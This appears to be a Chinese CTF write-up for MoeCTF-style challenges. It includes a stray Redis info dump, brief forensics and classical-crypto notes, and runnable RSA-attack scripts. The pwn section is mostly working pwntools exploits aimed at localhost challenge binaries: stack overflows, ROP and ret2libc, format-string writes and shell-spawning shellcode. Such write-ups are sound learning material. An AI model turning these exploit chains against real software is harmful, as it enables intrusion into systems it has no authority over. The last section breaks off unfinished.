得到-Are-YOu-myS0L-MasT3r?-
pip install redis

>>> r = redis.Redis(host='172.20.0.2', port=6379, db=0)
r = redis.Redis(host='172.20.0.2', port=6379, db=0)
>>> r.info()
r.info()
{'redis_version': '6.2.14', 'redis_git_sha1': 0, 'redis_git_dirty': 0, 'redis_build_id': '32759a165f0d308e', 'redis_mode': 'standalone', 'os': 'Linux 5.15.0-71-generic x86_64', 'arch_bits': 64, 'monotonic_clock': 'POSIX clock_gettime', 'multiplexing_api': 'epoll', 'atomicvar_api': 'c11-builtin', 'gcc_version': '12.2.0', 'process_id': 19, 'process_supervised': 'no', 'run_id': '5ed13119850428cace41651d5a84dddee600dbe8', 'tcp_port': 6379, 'server_time_usec': 1697725339377424, 'uptime_in_seconds': 14190, 'uptime_in_days': 0, 'hz': 10, 'configured_hz': 10, 'lru_clock': 3226523, 'executable': '/data/redis-server', 'config_file': '/etc/redis/redis.conf', 'io_threads_active': 0, 'connected_clients': 1, 'cluster_connections': 0, 'maxclients': 10000, 'client_recent_max_input_buffer': 0, 'client_recent_max_output_buffer': 0, 'blocked_clients': 0, 'tracking_clients': 0, 'clients_in_timeout_table': 0, 'used_memory': 875704, 'used_memory_human': '855.18K', 'used_memory_rss': 3837952, 'used_memory_rss_human': '3.66M', 'used_memory_peak': 875704, 'used_memory_peak_human': '855.18K', 'used_memory_peak_perc': '100.19%', 'used_memory_overhead': 811944, 'used_memory_startup': 811944, 'used_memory_dataset': 63760, 'used_memory_dataset_perc': '100.00%', 'allocator_allocated': 845608, 'allocator_active': 1105920, 'allocator_resident': 3469312, 'total_system_memory': 1743826944, 'total_system_memory_human': '1.62G', 'used_memory_lua': 30720, 'used_memory_lua_human': '30.00K', 'used_memory_scripts': 0, 'used_memory_scripts_human': '0B', 'number_of_cached_scripts': 0, 'maxmemory': 0, 'maxmemory_human': '0B', 'maxmemory_policy': 'noeviction', 'allocator_frag_ratio': 1.31, 'allocator_frag_bytes': 260312, 'allocator_rss_ratio': 3.14, 'allocator_rss_bytes': 2363392, 'rss_overhead_ratio': 1.11, 'rss_overhead_bytes': 368640, 'mem_fragmentation_ratio': 4.73, 'mem_fragmentation_bytes': 3026008, 'mem_not_counted_for_evict': 0, 'mem_replication_backlog': 0, 'mem_clients_slaves': 0, 'mem_clients_normal': 0, 'mem_aof_buffer': 0, 'mem_allocator': 'jemalloc-5.1.0', 'active_defrag_running': 0, 'lazyfree_pending_objects': 0, 'lazyfreed_objects': 0, 'loading': 0, 'current_cow_size': 0, 'current_cow_size_age': 0, 'current_fork_perc': 0.0, 'current_save_keys_processed': 0, 'current_save_keys_total': 0, 'rdb_changes_since_last_save': 0, 'rdb_bgsave_in_progress': 0, 'rdb_last_save_time': 1697711149, 'rdb_last_bgsave_status': 'ok', 'rdb_last_bgsave_time_sec': -1, 'rdb_current_bgsave_time_sec': -1, 'rdb_last_cow_size': 0, 'aof_enabled': 0, 'aof_rewrite_in_progress': 0, 'aof_rewrite_scheduled': 0, 'aof_last_rewrite_time_sec': -1, 'aof_current_rewrite_time_sec': -1, 'aof_last_bgrewrite_status': 'ok', 'aof_last_write_status': 'ok', 'aof_last_cow_size': 0, 'module_fork_in_progress': 0, 'module_fork_last_cow_size': 0, 'total_connections_received': 1, 'total_commands_processed': 2, 'instantaneous_ops_per_sec': 0, 'total_net_input_bytes': 124, 'total_net_output_bytes': 172, 'instantaneous_input_kbps': 0.0, 'instantaneous_output_kbps': 0.0, 'rejected_connections': 0, 'sync_full': 0, 'sync_partial_ok': 0, 'sync_partial_err': 0, 'expired_keys': 0, 'expired_stale_perc': 0.0, 'expired_time_cap_reached_count': 0, 'expire_cycle_cpu_milliseconds': 176, 'evicted_keys': 0, 'keyspace_hits': 0, 'keyspace_misses': 0, 'pubsub_channels': 0, 'pubsub_patterns': 0, 'latest_fork_usec': 0, 'total_forks': 0, 'migrate_cached_sockets': 0, 'slave_expires_tracked_keys': 0, 'active_defrag_hits': 0, 'active_defrag_misses': 0, 'active_defrag_key_hits': 0, 'active_defrag_key_misses': 0, 'tracking_total_keys': 0, 'tracking_total_items': 0, 'tracking_total_prefixes': 0, 'unexpected_error_replies': 0, 'total_error_replies': 2, 'dump_payload_sanitizations': 0, 'total_reads_processed': 3, 'total_writes_processed': 2, 'io_threaded_reads_processed': 0, 'io_threaded_writes_processed': 0, 'role': 'master', 'connected_slaves': 0, 'master_failover_state': 'no-failover', 'master_replid': '72bf10998fb01f8851a13c92aaf4ccbbed81ab83', 'master_replid2': 0, 'master_repl_offset': 0, 'second_repl_offset': -1, 'repl_backlog_active': 0, 'repl_backlog_size': 1048576, 'repl_backlog_first_byte_offset': 0, 'repl_backlog_histlen': 0, 'used_cpu_sys': 6.963199, 'used_cpu_user': 8.13399, 'used_cpu_sys_children': 0.0, 'used_cpu_user_children': 0.0, 'used_cpu_sys_main_thread': 6.965816, 'used_cpu_user_main_thread': 8.12967, 'errorstat_ERR': 'count=2', 'cluster_enabled': 0}

https://blog.csdn.net/guo15890025019/article/details/116994677
未完待续……….（咕咕咕

Forensics

随身携带的虚拟机

vm挂载vmdk，windows10系统
打开后回收站里有key，用key打开锁上的磁盘即可

坚持访问的浏览器

锁定起来的同人文

挂载vc
"L:\data\20230707221115-ibr7vs7\20230707221136-xyfn5al\20230707221147-1rzo2wp\20230707221158-6te2bxl.sy"

base32moectf{S0_d33ply_H1dden!}

classical Crypto

不是“皇帝的新密码”

维吉尼亚，根据flag格式，用key moectf{解维吉尼亚得到开头为goodjo猜测key为goodjob解密即可

猫言喵语

喵喵？–》- 喵喵喵–》.

ezrot

rot47

可可的新围墙

皇帝的新密码

凯撒7

Ai

EZ MLP

调换即可
moectf{fR13NdsHlP_15_M491C!}

pwn

ret2text_32

from pwn import *

context.log_level = 'debug'

elf = ELF('./pwn')
str_binsh_addr = 0x804C02C
sys_plt = elf.plt['system']

p = remote('localhost',50227)
p.recvuntil(b'What\'s your age?')
p.sendline(b'200')
p.recvuntil(b'Now..try to overflow!')

payload = b'a' * (0x58 + 0x4) + p32(sys_plt) + b'a' * 4 + p32(str_binsh_addr)
p.sendline(payload)
p.interactive()

baby_calculator

import pwn
X = pwn.remote("localhost",50677)
while 1:
   tmp = X.recvline()
   print(tmp.decode())
   if b'The first:' in tmp:
      x=tmp.decode().index('t')
      res1=tmp.decode()[x+2:]
   if b'The second:'in tmp:
      res2=tmp.decode()[11:]
   if b'=' in tmp:
      val=tmp.decode()[len(res1)+len(res2):]
      if(int(res1.replace('\n',''))+int(res2)==int(val)):
        data1="BlackBird".encode()
        X.sendline(data1)
      else:
        data2="WingS".encode()
        X.sendline(data2)
   if b'Congratulations!You finish' in tmp:
      X.interactive()
      tmp = X.recvline()
      print(tmp.decode())

int_overflow

整形溢出

int 的取值范围 -2147483648～2147483647
-114514=2147483647+1+2147483648-114514
v1=4294852782

fd

fd2=4*1|0x29A=670

ret2text_64

from pwn import *

re = remote('localhost', 00000)
elf = ELF('./pwn')				
binsh = 0x404050				
system_plt = elf.symbols['system']		
system_plt2 = 0x4012B7
rdi_ret = 0x4011be				
payload = b'a' * 88 + p64(rdi_ret) + p64(binsh) + p64(system_plt2)

print(re.recv(4096).decode())
re.sendline('120'.encode())

print(re.recv(4096).decode())
re.sendline(payload)
re.interactive()

shellcode_level0

网上找到shellcode

from pwn import *

p = remote('localhost',34897)
shellcode='\x6a\x3b\x58\x99\x52\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x53\x54\x5f\x52\x57\x54\x5e\x0f\x05'
p.sendline(shellcode)
p.interactive()

uninitialized_key

# coding=utf-8
from pwn import *


context.log_level = "debug"
context.arch = "amd64"
p = remote('localhost', 42085)
#p = process('./uninitialized_key')

p.sendline("114514")
gdb.attach(p)
p.sendline("\x00")#或者就直接留空。p.sendline("")

p.interactive()

format_level0

# coding=utf-8
from pwn import *

flag = ""
for i in range(7,17):
    p = remote('localhost', 32809)
    # p = process('./format_level0')

    # gdb.attach(p)
    p.sendline(f"%{i}$p")
    p.recvuntil("0x")

    byte_str = binascii.unhexlify(p.recvline()[:-1])
    str_result = byte_str.decode("utf-8")
    flag+=str_result[::-1]

    p.close()

print(flag)

PIE_enabled

# coding=utf-8
from pwn import *

context.arch = "amd64"
p = remote('localhost', 45993)
#p = process('./pwn')

p.recvuntil("0x")
leak = int(p.recvline()[:-1], 16)
base_add = leak - 0x1245
system_add = base_add + 0x10A0
bash = base_add + 0x4010
pop_rdi = base_add + 0x0000000000001323
ret = base_add + 0x128D
success(hex(base_add))

# gdb.attach(p)
paylaod = b'a' * 0x58 + p64(pop_rdi) + p64(bash) + p64(ret) + p64(system_add)
p.sendline(paylaod)

p.interactive()

shellcode_level1

# coding=utf-8
from pwn import *

context.arch = "amd64"
# p = remote('localhost', 54369)
p = process('./shellcode_level1')
# gdb.attach(p)
p.sendline("4")
payload = asm(shellcraft.sh())

p.sendline(payload)

p.interactive()

Uninitialized_key_plus

# coding=utf-8
from pwn import *

# context.log_level = "debug"
context.arch = "amd64"
p = remote('localhost', 33067)
# p = process('./uninitialized_key_plus')

payload = b"a"*20 + p32(0x1BF52)
p.sendline(payload)
p.sendline(b"\x00")

p.interactive()

format_level1

# coding=utf-8
from pwn import *

from ctypes import *

context.log_level = "debug"
# context.arch = "amd64"
p = remote('localhost',33853)
# p = process('./format_level1')

p.sendline("3")
payload = b"%8$n" + p64(0x804c00c)
p.sendline(payload)
# gdb.attach(p)
p.sendline(b"1")

p.interactive()

rePWNse

# coding=utf-8
from pwn import *

from ctypes import *

# context.log_level = "debug"
context.arch = "amd64"
p = remote('localhost', 35899)
# p = process('./rePWNse')


pop_rdi = 0x000000000040168e

p.sendline("1")            #7
p.sendline("9")        #8
p.sendline("1")            #9
p.sendline("9")        #10
p.sendline("8")            #11
p.sendline("1")            #12
p.sendline("0")            #13

p.recvuntil("address is:")
leak = int(p.recvline()[2:-1],16)
# gdb.attach(p)
payload = b'a'*0x48+p64(pop_rdi)+p64(leak)+p64(0x401296)
p.sendline(payload)

p.interactive()

changeable_shellcode

# coding=utf-8
from pwn import *

from ctypes import *

# context.log_level = "debug"
context.arch = "amd64"
p = remote('localhost',34369)
# p = process('./shellcode')


shellcode = '''
mov byte ptr[rax+33], 5
push 0
mov rax, 0x68732f2f6e69622f
push rax
push rsp
pop rdi
xor rsi, rsi
xor rdx, rdx
mov rax, 59
'''
p.sendline(asm(shellcode)+b'\x0f')

p.interactive()

format_level2

# coding=utf-8
from pwn import *

from ctypes import *

# context.log_level = "debug"
# context.arch = "amd64"
p = remote('localhost',40621)
# p = process('./format_level2')

p.sendlineafter(":",b"3")
p.sendlineafter(":",b"%p")

p.recvuntil("0x")
stack = int(p.recvline()[:-1], 16)
func_ret = stack + 64
p.sendline(b"3")
payload = b"%23p%10$hhn".ljust(12, b'a') + p32(func_ret)
p.send(payload)
p.sendlineafter(":",b"3")
payload = b"%147p%10$hhn".ljust(12, b'a') + p32(func_ret+1)
p.sendlineafter(":",payload)
p.sendlineafter(":",b"4")

p.interactive()

feedback

# coding=utf-8
from pwn import *
 
from ctypes import *

# context.log_level = "debug"
context.arch = "amd64"
p = remote('localhost', 42147)
# p = process('./feedback')

p.sendlineafter("Which list do you want to write?",b"-8")
payload = p64(0xFBAD1800) + p64(0)*3 + b'\x00'
p.sendlineafter(".\n",payload)

p.recvuntil(b'\x00'*8)
libc_base = u64(p.recv(8)) - 0x1ec980
success(hex(libc_base))
flag = libc_base + 0x1f1700

p.sendlineafter("?",b"-11")
p.sendlineafter(".",b'\x68')
p.sendlineafter("?",b"-11")
p.sendlineafter(".",p64(flag))

p.interactive()

format_level3

# coding=utf-8
from pwn import *

from ctypes import *

# context.log_level = "debug"
# context.arch = "amd64"
p = remote('localhost',42835)
# p = process('./format_level3')

p.sendlineafter(":",b"3")
p.sendlineafter(":",b"%6$p")
p.recvuntil("0x")
stack = int(p.recvline()[:-1], 16)
func_ret = stack + 4

p.sendlineafter(":",b"3")
payload = "%{}p%6$hhn".format(func_ret & 0xff)
p.sendlineafter(":",payload.encode())
p.sendlineafter(":",b"3")
payload = "%{}p%14$hn".format(0x9317)
p.sendlineafter(":",payload.encode())
p.sendlineafter(":",b"4")
p.interactive()

ret2libc

from pwn import *
from LibcSearcher import*
context.arch = "amd64"
p = remote('localhost', 38193)
#p = process('./pwn(1)')
elf = ELF("./pwn")
#libc = ELF("./libc6_2.7-10ubuntu3_amd64.so")

pop_rdi = 0x000000000040117e
main = 0x4011E8

p1 = b"a" * (0x50 + 0x8)
p1 += p64(pop_rdi) + p64(elf.got['puts'])
p1 += p64(elf.plt['puts'])
p1 += p64(main)
p.sendline(p1)

puts_addr = u64(p.recvuntil(b"\x7f")[-6:].ljust(8, b"\x00"))
success("puts:%s",hex(puts_addr))

libc = LibcSearcher('puts',puts_addr)
libc_base = puts_addr - libc.dump('puts')
system_addr = libc_base + libc.dump('system')
bin_addr = libc_base + libc.dump('str_bin_sh')

p2 = b"a" * (0x50 + 0x8)
one = [0x50a37, 0xebcf1, 0xebcf5, 0xebcf8]
# p2 += p64(libc_base + one[3])
p2 += p64(pop_rdi) + p64(bin_addr) + p64(0x40122A)
p2 += p64(system_addr)
p.sendline(p2)
p.interactive()

ret2syscall

# coding=utf-8
from pwn import *

context.arch = "amd64"
p = remote('localhost', 40953)
# p = process('./ret2syscall')
elf = ELF("./ret2syscall")
libc = ELF("./libc6_2.35-0ubuntu3_amd64.so")

pop_rax = 0x000000000040117e
pop_rdi = 0x0000000000401180
pop_rsi_rdx = 0x0000000000401182
bss = 0x0000000000404060
ret = 0x00000000004011C1
syscall_addr = 0x401185
binsh_addr = 0x0000000000404040

payload = b"a" * 0x48
payload += p64(pop_rdi) + p64(binsh_addr)  # stackoverflow & rdi=binsh_addr
payload += p64(pop_rsi_rdx) + p64(0) + p64(0)  # rsi=0 rdx=0
payload += p64(pop_rax) + p64(59)  # rax=59 
payload += p64(syscall_addr)  # execve("/bin/sh",0,0)
p.sendline(payload)
p.interactive()

shellcode_level2

from pwn import *

context.arch = "amd64"
p = remote('localhost', 41523)
# p = process('./shellcode_level2')
elf = ELF("./shellcode_level2")
libc = ELF("./libc6_2.35-0ubuntu3_amd64.so")

payload = b'\x00'+asm(shellcraft.sh()) 
# gdb.attach(p)
p.sendline(payload)
p.interactive()

little_canary

# coding=utf-8
from pwn import *
from LibcSearcher import *  
from ctypes import *

# context.log_level = "debug"
# context.arch = "amd64"
p = remote('localhost', 40905)
# p = process('./little_canary')
elf = ELF("./pwn")
# libc = ELF("./libc-2.32-1.fc33.x86_64.so")

main = 0x4012BA
pop_rdi = 0x0000000000401343

p.sendlineafter(b"name?\n",b"a"*72)
p.recvuntil(b"\n")
canary = u64(b"\x00"+p.recv(7))
# gdb.attach(p)
success(hex(canary))
print(hex(elf.got['puts']))
payload = b'a'*72+p64(canary)+p64(0)
payload += p64(pop_rdi) + p64(elf.got['puts'])
payload += p64(elf.plt['puts'])
payload += p64(main)
p.sendline(payload)

leak = u64(p.recvuntil(b"\x7f")[-6:].ljust(8, b"\x00"))
leak = u64(p.recvuntil(b"\x7f")[-6:].ljust(8, b"\x00"))
libc = LibcSearcher('puts',leak)  
libc_base = leak - libc.dump('puts')
success(hex(libc_base))

p.sendline(b"payload")

payload = b'a'*72+p64(canary)+p64(0)
payload += p64(pop_rdi) + p64(libc_base + libc.dump("str_bin_sh"))+p64(0x4012DC)
payload += p64(libc_base + libc.dump('system'))
p.sendline(payload)

p.interactive()

shellcode_level3

# coding=utf-8
from pwn import *
from LibcSearcher import *  
from ctypes import *

# context.log_level = "debug"
context.arch = "amd64"
p = remote('localhost', 34733)
elf = ELF("./shellcode_level3")
libc = ELF("./libc6_2.35-0ubuntu3_amd64.so")


p.sendline(b"\xE9\x48\xD1\xFF\xFF")
p.interactive()

crypto

baby_e

import libnum
import gmpy2

n = 553409369582823237678532685244026647155180191225879439432235077135813123637186465008813830373646133388592395760175777499266561095087891764348044063111935877931069321764391883899483374576303169645488542398590564148654412004383012178107972880058460460806768779452529433458826925606225797078653905380530651390617109384086518728626571028089036812787671647095695947167204428442727185744172445701874820612799168887428075695751162763647868386879374037826876671079326544820609721731078985096813307183878793033824330869698508952853770794414757655681370862323768018291030331209143189638496644361618184164228294031490537429556439588954274708598530042700988138862000054458742762198052079867259365645914383561162796796952346445529346145323567650621600171442575319262718389389870407629339714751583360252884338116164466349449862781112019462555743429653595045695696967783338371470032332852204294900011651434678829104876529439166176589508898757122660322523937330848536715937381297551894198974459004139082562228022412335520195652419375915216074658463954339332593244483927157329404652516225481116614815221154229491846087288087715884363786672244655901308480290011237244562251084095684531716327141154558809471185132979704992609461470501119328696999713829
e = 7
c = 147693154873835354725007152781732424355869776162377337823960431913672366269917723916891506269449726723757821517328874729037838600793748824028829185409932536014732765063216715033843955453706710187792772702199448156372644163429786386035008302836467605094954587157232829525150652611067567669525072625329634860065850520051628272535479197120008981979404760445193750864902244921407742155742716289495581989134730376783828846663464819337418977287363028738701414486788851136608957124505485242331701209645216580641917007780811842757125048746184068597664780265422321550909392419865169775282217442331295071069272774722564587602419768461231775480847018941840911357926330143045826277813722919121117172763493242590521245640828462665947672485094793188432098216701511715232654611338293295459889814699850788048985878279440740712956248569068077253790198036918598519191892836075254345518967666166925163908185663991353344555402397055977817370082929420443034626201745027965444069777059760865359310439815816749939498993014457995041394803598825093836045546578310632172636478575946653375857640993393714607308326474003446154152048840071034349831168612740218034679021240949747357214453636633636662650940968576792518622437627529244515229173

def exp(n, e, c):
    k = 0
    while 1:
        m1 = k * n + c
        m, t = gmpy2.iroot(m1, e)
        if t:
            print(libnum.n2s(int(m)))
            break
        k += 1
exp(n, e, c)

bad_E

from gmpy2 import *
from Crypto.Util.number import *
 
e = 65537
p = 11727544912613560398705401423145382428897876620077115390278679983274961030035884083100580422155496261311510530671232666801444557695190734596546855494472819
q = 6853495238262155391975011057929314523706159020478084061020122347902601182448091015650787022962180599741651597328364289413042032923330906135304995252477571
c = 63388263723813143290256836284084914544524440253054612802424934400854921660916379284754467427040180660945667733359330988361620691457570947823206385692232584893511398038141442606303536260023122774682805630913037113541880875125504376791939861734613177272270414287306054553288162010873808058776206524782351475805
n = p*q
 
phi_n = (p-1)*(q-1)
print(GCD(e,q-1))
d = gmpy2.invert(e,(p-1))
m = pow(c,d,p)
print(long_to_bytes(m))

n&n

import libnum
import gmpy2

n= 13612969130810965900902742090064423006385890357159609755971027204203418808937093492927060428980020085273603754747223030702684866992231913349067578014240319426522039068836171388168087260774376277346092066880984406890296520951318296354893551565670293486797637522297989653182109744864444697818991039473180752980752117041574628063002176339235126861152739066489620021077091941250365101779354009854706729448088217051728432010328667839532327286559570597994183126402340332924370812383312664419874352306052467284992411543921858024469098268800500500651896608097346389396273293747664441553194179933758992070398387066135330851531
e1= 0x114514
e2= 19198101
c1= 5776799746376051463605370130675046329799612910435315968508603116759552095183027263116443417343895252766060748671845650457077393391989018107887540639775168897954484319381180406512474784571389477212123123540984850033695748142755414954158933345476509573211496722528388574841686164433315356667366007165419697987147258498693175698918104120849579763098045116744389310549687579302444264316133642674648294049526615350011916160649448726069001139749604430982881450187865197137222762758538645387391379108182515717949428258503254717940765994927802512049427407583200118969062778415073135339774546277230281966880715506688898978925
c2= 4664955020023583143415931782261983177552050757537222070347847639906354901601382630034645762990079537901659753823666851165175187728532569040809797389706253282757017586285211791297567893874606446000074515260509831946210526182765808878824360460569061258723122198792244018463880052389205906620425625708718545628429086424549277715280217165880900037900983008637302744555649467104208348070638137050458275362152816916837534704113775562356277110844168173111385779258263874552283927767924979691542028126412133709129601685315027689094437957165812994784648540588277901241854031439324974562449032290219652206466731675967045633360

def exp_def(e1,e2,c1,c2,n):
    s,s1,s2 = gmpy2.gcdext(e1, e2)
    m = (pow(c1,s1,n) * pow(c2 ,s2 ,n)) % n
    return int(m)

m=exp_def(e1,e2,c1,c2,n)
print(libnum.n2s(m))

factor_signin

factordb

p1 = 18055722101348711626577381571859114850735298658417345663254295930584841136416234624852520581982069555948490061840244710773146585295336094872892685938420880462305333393436098181186277450475949236132458958671804132443554885896037342335902958516394876382378829317303693655605215373555988755516058130500801822723195474873517960624159417903134580987202400855946137101429970119186394052011747475879598126195607938106163892658285305921071673588966184054026228745012993740035399652049777986535759039077634555909031397541116025395236871778797949216479130412500655359057128438928721459688727543057760739527720641179290282309741
q1 = 19024691283015651666032297670418553586155390575928421823630922553034857624430114628839720683172187406577114034710093054198921843669645736474448836706112221787749688565566635453151716934583685087745112614898780150391513798368931496744574075511968933800467288441832780919514199410584786925010518564670786685241724643282580795568609339268652910564215887176803735675069372979560024792322029911970574914829712553975379661212645059271137916107885326625543090473004683836665262304916304580076748336858662108554591235698235221618061328251985929904075811056422186525179189846420226944944513865790999242309352900287977666792901
n1 = 343504538870081878757729748260620800783581983635281373321527119223374418103340873199654926888439040391545101913132680017655039577253974802351999985470115474655124168592386965001556620077117966153475518658881140827499124290142523464795351995478153288872749817655925271395693435582010998996210909883510311066017237567799370371513462802547313382594409676803895262837061350017911885033133654781876923251129406855067993830824618637981136966134029212516871210627954762147349788788999116702635535406398258621926040887099782494271000823401788337120154104692934583729065189687995570122890809807661370008740283447636580308161498808092269041815719148127168137018600113465985504975054319601741498799761500526467431533990903047624407330243357514588557352746347337683868781554819821575385685459666842162355673947984514687068626166144076257334426612302554448774082488600083569900006274897032242821388126274957846236552373226099112200392102883351088570736254707966329366625911183721875374731791052229266503696334310835323523568132399330263642353927504971311717117370721838701629885670598853025212521537158141447625623337563164790788106598854822686494249848796441153496412236527242235888308435573209980270776407776277489669763803746640746378181948641
e = 65537
c1 = 10004937130983861141937782436252502991050957330184611684406783226971057978666503675149401388381995491152372622456604317681236160071166819028679754762162125904637599991943368450200313304999566592294442696755822585022667008378021280392976010576970877334159755332946926433635584313137140987588847077645814987268595739733550220882135750267567373532603503399428451548677091911410732474324157868011686641243202218731844256789044721309478991918322850448456919991540932206923861653518190974620161055008847475600980152660468279765607319838003177639654115075183493029803981527882155542925959658123816315099271123470754815045214896642428657264709805029840253303446203030294879166242867850331945166255924821406218090304893024711068773287842075208409312312188560675094244318565148284432361706108491327014254387317744284876018328591380705408407853404828189643214087638328376675071962141118973835178054884474523241911240926274907256651801384433652425740230755811160476356172444327762497910600719286629420662696949923799255603628210458906831175806791599965316549386396788014703044837917283461862338269599464440202019922379625071512100821922879623930069349084917919100015782270736808388388006084027673781004085620817521378823838335749279055639005125
import gmpy2
from Crypto.Util.number import *
d1 = gmpy2.invert(e,(p1-1)*(q1-1))
m1=pow(c1,d1,n1)

c2 =  4948422459907576438725352912593232312182623872749480015295307088166392790756090961680588458629287353136729331282506869598853654959933189916541367579979613191505226006688017103736659670745715837820780269669982614187726024837483992949073998289744910800139692315475427811724840888983757813069849711652177078415791290894737059610056340691753379065563574279210755232749774749757141836708161854072798697882671844015773796030086898649043727563289757423417931359190238689436180953442515869613672008678717039516723747808793079592658069533269662834322438864456440701995249381880745586708718334052938634931936240736457181295
n2 =  8582505375542551134698364096640878629785534004976071646505285128223700755811329156276289439920192196962008222418309136528180402357612976316670896973298407081310073283979903409463559102445223030866575563539261326076167685019121804961393115251287057504682389257841337573435085535013992761172452417731887700665115563173984357419855481847035192853387338980937451843809282267888616833734087813693242841580644645315837196205981207827105545437201799441352173638172133698491126291396194764373021523547130703629001683366722885529834956411976212381935354905525700646776572036418453784898084635925476199878640087165680193737

n2b=[9949603102225364603,10049235158029375571,10547615587767500213,10596280721192026229,10864078180916418691,11092420583960163379,11853704782834170959,12034779627328165471,12404642343676224637,12448177342966243757,13062839684118954553,13645878578452317313,14397830993057803133,14619040595108594017,14678737767649343977,14745811312384518031,14813953870710226847,15175734709842430433,15211380502610462057,15332916111580607077,15751974537676958401,16123604149048919099,16408421615173973083,16870346804576162551,17093292308638969889,17265001711647542137,17289161209347211817,17543713628803023199,17673334943789572513,18106525049998616747,18345408081492711641,18390046459144888243]
phi2= 1
for i in n2b:
    phi2 *= (i-1)
d2=gmpy2.invert(e,phi2)
m2=pow(c2,d2,n2)
print(long_to_bytes(m1)+long_to_bytes(m2))

|p-q|

import gmpy2
from Crypto.Util.number import *
e=65537
c = 307746143297103281117512771170735061509547958991947416701685589829711285274762039205145422734327595082350457374530975854337055433998982493020603245187129916580627539476324521854057990929173492940833073106540441902619425074887573232779899379436737429823569006431370954961865581168635086246592539153824456681688944066925973182272443586463636373955966146029489121226571408532284480270826510961605206483011204059402338926815599691009406841471142048842308786000059979977645988396524814553253493672729395573658564825709547262230219183672493306100392069182994445509803952976016630731417479238769736432223194249245020320183199001774879893442186017555682902409661647546547835345461056900610391514595370600575845979413984555709077635397717741521573798309855584473259503981955303774208127361309229536010653615696850725905168242705387575720694946072789441481191449772933265705810128547553027708513478130258801233619669699177901566688737559102165508239876805822898509541232565766265491283807922473440397456701500524925191214292669986798631732639221198138026031561329502985577205314190565609214349344303324429408234237832110076900414483795318189628198913032900272406887003325858236057373096880675754802725017537119549989304878960436575670784578550
n = 329960318345010350458589325571454799968957932130539403944044204698872359769449414256378111233592533561892402020955736786563103586897940757198920737583107357264433730515123570697570757034221232010688796344257587359198400915567115397034901247038275403825404094129637119512164953012131445747740645183682571690806238508035172474685818036517880994658466362305677430221344381425792427288500814551334928982040579744048907401043058567486871621293983772331951723963911377839286050368715384227640638031857101612517441295926821712605955984000617738833973829140899288164786111118033301974794123637285172303688427806450817155786233788027512244397952849209700013205803489334055814513866650854230478124920442832221946442593769555237909177172933634236392800414176981780444770542047378630756636857018730168151824307814244094763132088236333995807013617801783919113541391133267230410179444855465611792191833319172887852945902960736744468250550722314565805440432977225703650102517531531476188269635151281661081058374242768608270563131619806585194608795817118466680430500830137335634289617464844004904410907221482919453859885955054140320857757297655475489972268282336250384384926216818756762307686391740965586168590784252524275489515352125321398406426217
def factor(n):
    a = gmpy2.iroot(n, 2)[0]
    while 1:
        B2 = pow(a, 2) - n
        if gmpy2.is_square(B2):
            b = gmpy2.iroot(B2, 2)[0]
            p = a + b
            q = a - b
            return p,q
        a += 1  

#print(factor(n))
p = 18164809890142267890219276206773099235072154806950582020347085518282960761937147879570277730919110196557742226232054602784278585009762036923951358612733074768279344311938292845187804144458991947979616574535662033512236959010688698879953460760771547964758688700129994322153904156260452550830932232536673055480604083903327472696393017478985867846428177588049472509968031143243583420309569129756696755744088888618703553769561648077215188783123207031628505020478500655602448720006243614258852026797076054766680755124052134730998085155245587457870148748357237005392662882609410088994421984160941612734270140092780661013147
q = 18164809890142267890219276206773099235072154806950582020347085518282960761937147879570277730919110196557742226232054602784278585009762036923951358612733074768279344311938292845187804144458991947979616574535662033512236959010688698879953460760771547964758688700129994322153904156260452550830932232536673055480604083903327472696393017478985867846428177588049472509968031143243583420309569129756696755744088888618703553769561648077215188783123207031628505020478500655602448720006243614258852026797076054766680755124052134730998085155245587457870148748357237005392662882609410088994421984160941612734270140092780661012811
d=gmpy2.invert(e,(p-1)*(q-1))
m=pow(c,d,n)
print(long_to_bytes(m))

rsa_signin

n1 = 17524722204224696445172535263975543817720644608816706978363749891469511686943372362091928951563219068859089058278944528021615923888948698587206920445508493551162845371086030869059282352535451058203615402089133135136481314666971507135484450966505425514285114192275051972496161810571035753943880190780759479521486741046704043699838021850105638224212696697865987677760179564370167062037563913329993433080123575434871852732981112883423565015771421868680113407260917902892944119552200927337996135278491046562185003012971570532979090484837684759828977460570826320870379601193678304983534424368152743368343335213808684523217
c1 = 6870605439714128574950893771863182370595667973241984289208050776870220326525943524507319708560433091378319367164606150977103661770065561661544375425887970907060665421562712515902428061727268441585629591525591001533188276465911918724808701356962871139957343861919730086334623932624184172272488406793955068827527130338853980609365042071290967556159598511667974987218999253443575482949258292953639729393456515185185102248985930422080581185292420347510600574229080211050520146551505605537486989306457793451086767402197128573781597156939709237045132856159368959981648969874765462190363842275826077556314448408825308218451
n2 = 24974121071274650888046048586598797033399902532613815354986756278905133499432183463847175542164798764762683121930786715931063152122056911933710481566265603626437742951648885379847799327315791800670175616973945640322985175516271373004547752061826574576722667907302681961850865961386200909397231865804894418194711076667760169256682834206788730947602211228930301853348503098156592000286467190760378847541148772869356389938999094673945092387627113807899212568399028514283219850734634544982646070106811651490010946670117927664594365986238107951837041859682547029079035013475238052160645871718246031144694712586073789250183
c2 = 10324627733161143472233272675096997859064721978612320424254305978486200326061730105384511258706433940176741256952824288120499229240005823611541292676234913505775165761543820764046537413943393325463602612485849366939102550336256797820440347815027443410399157963547486098366749815425187247171697678576246606105486928212486117878157055321965270364583625270716186820068538749425299073309429589410882809098930213978117176627031795312102177342499674234163614021182116065492884880492891668658240362567156235958605768725892407536211503981819707919444725863397622629226309480836486427388484176463279384813974310500625102568341
n3 = 14215826065753265334521416948225868542990756976323308408298887797364519400310818641526401662106853573185085731682502059761982246604277475488691297554851873224516934619888327644352138127883043558424300092247604877819821625587944308487310522092440517150600171819145803937177931473336108429889165189521078678397694303305705260759351843006130968234071638035667854938070597400634242396852782331461576526836227336952718230741560369621645218729592233657856104560425642219241082727756696967324334634822771842625681505869025740662258929200756109704988223034840699133778958569054445520305361142302393767439478256174414187983763
c3 = 415916446053083522663299405080903121619846594209033663622616979372099135281363175464579440520262612010099820951944229484417996994283898028928384268216113118778734726335389504987546718739928112684600918108591759061734340607527889972020273454098314620790710425294297542021830654957828983606433731988998097351888879368160881316237557097381718444193741788664735559392675419489952796677690968481917700683813252460912749931286739585465657312416977086336732056497161860235343155953578618273940135486362350057858779130960380833359506761436212727289297656191243565734621757889931250689354508999144817518599291078968866323093
